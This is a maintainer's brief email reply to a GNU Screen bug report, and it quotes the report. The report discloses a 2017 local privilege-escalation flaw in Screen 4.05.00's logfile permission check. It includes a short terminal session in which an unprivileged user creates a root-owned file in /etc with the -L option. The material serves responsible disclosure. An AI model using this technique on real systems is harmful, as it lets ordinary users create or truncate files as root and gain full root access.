Thank you for report! I'm going to fix it as quick as possible. I'm also think about security update release.
On Tue, Jan 24, 2017 at 8:05 PM, anonymous <invalid.nore...@gnu.org> wrote: > URL: > <http://savannah.gnu.org/bugs/?50142> > > Summary: root exploit 4.5.0 > Project: GNU Screen > Submitted by: None > Submitted on: Tue 24 Jan 2017 07:05:09 PM UTC > Category: Program Logic > Severity: 3 - Normal > Priority: 5 - Normal > Status: None > Privacy: Private > Assigned to: None > Open/Closed: Open > Discussion Lock: Any > Release: None > Fixed Release: None > Planned Release: None > Work Required: None > > _______________________________________________________ > > Details: > > Commit f86a374 ("screen.c: adding permissions check for the logfile name", > 2015-11-04) > > The check opens the logfile with full root privileges. This allows us to > truncate any file or create a root-owned file with any contents in any > directory and can be easily exploited to full root access in several ways. > >> buczek@theinternet:~$ screen --version >> Screen version 4.05.00 (GNU) 10-Dec-16 >> buczek@theinternet:~$ id >> uid=125(buczek) gid=125(buczek) > groups=125(buczek),15(users),19(adm),42(admin),154(Omp3grp),200(algrgrp),209(cdgrp),242(gridgrp),328(nchemgrp),407(hoeheweb),446(spwgrp),453(helpdesk),512(twikigrp),584(zmgrp),598(edv),643(megamgrp),677(greedgrp),5000(abt_srv),16003(framesgr),16012(chrigrp),17001(priv_cpw) >> buczek@theinternet:~$ cd /etc >> buczek@theinternet:/etc (master)$ screen -D -m -L bla.bla echo fail >> buczek@theinternet:/etc (master)$ ls -l bla.bla >> -rw-rw---- 1 root buczek 6 Jan 24 19:58 bla.bla >> buczek@theinternet:/etc (master)$ cat bla.bla >> fail >> buczek@theinternet:/etc (master)$ > > Donald Buczek <buc...@molgen.mpg.de> > > > > > > _______________________________________________________ > > Reply to this item at: > > <http://savannah.gnu.org/bugs/?50142> > > _______________________________________________ > Message sent via/by Savannah > http://savannah.gnu.org/ > >
